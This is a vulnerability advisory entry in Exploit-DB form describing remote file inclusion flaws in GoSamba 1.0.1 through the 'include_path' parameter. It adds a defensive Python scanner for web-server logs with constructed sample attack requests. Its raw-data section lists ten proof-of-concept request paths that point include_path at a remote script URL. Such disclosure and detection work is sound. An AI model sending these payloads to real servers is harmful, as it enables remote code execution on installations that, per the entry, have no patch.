Vendor: GoSamba
By: milw0rm.com
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: GoSamba
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities

The GoSamba 1.0.1 software is vulnerable to multiple remote file inclusion vulnerabilities. Attackers can exploit these vulnerabilities by including arbitrary remote files via the 'include_path' parameter in various PHP files.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software. Additionally, it is advised to validate and sanitize user input before including files.
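
Since the advisory lists no patch, defenders can also watch web-server logs for requests that set include_path to a URL. The following is an added example, not part of the original advisory or of GoSamba: it assumes combined-format access logs, and the log lines, the 192.0.2.x addresses and the host files.example are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value beginning with a URL scheme or stream wrapper: http://, ftp://, php://, data:
WRAPPER_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|data:)', re.IGNORECASE)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2007:10:00:01 +0000] "GET /inc_group.php?include_path=http://files.example/a.txt? HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.10 - - [27/Oct/2007:10:00:02 +0000] "GET /main.php?include_path=hTTp%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.20 - - [27/Oct/2007:10:00:03 +0000] "GET /main.php?include_path=include/ HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.20 - - [27/Oct/2007:10:00:04 +0000] "GET /inc_user.php HTTP/1.1" 200 1024 "-" "-"',
]

def flag_remote_include(line, param="include_path"):
    """Return (path, value) if the request sets `param` to a URL or wrapper, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl percent-decodes each value once, as the web server would.
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key == param and WRAPPER_RE.match(value):
            return target.path, value
    return None

def scan(lines, param="include_path"):
    """Return every (path, value) hit found in an iterable of log lines."""
    hits = []
    for line in lines:
        hit = flag_remote_include(line, param)
        if hit is not None:
            hits.append(hit)
    return hits

if __name__ == "__main__":
    for path, value in scan(SAMPLE_LOG):
        print(f"possible RFI attempt: {path} include_path={value}")
```
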
Source

Exploit-DB raw data:

#################################################################################
#  GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities
#  http://mesh.dl.sourceforge.net/sourceforge/gosamba/gosamba.1.0.1.tar.gz
#  POC :
#  /inc_group.php?include_path=http://localhost/scripts/020.txt?
#  /inc_manager.php?include_path=http://localhost/scripts/020.txt?
#  /inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
#  /inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
#  /inc_user.php?include_path=http://localhost/scripts/020.txt?
#  /main.php?include_path=http://localhost/scripts/020.txt?
#  /include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?
#################################################################################

# milw0rm.com [2007-10-27]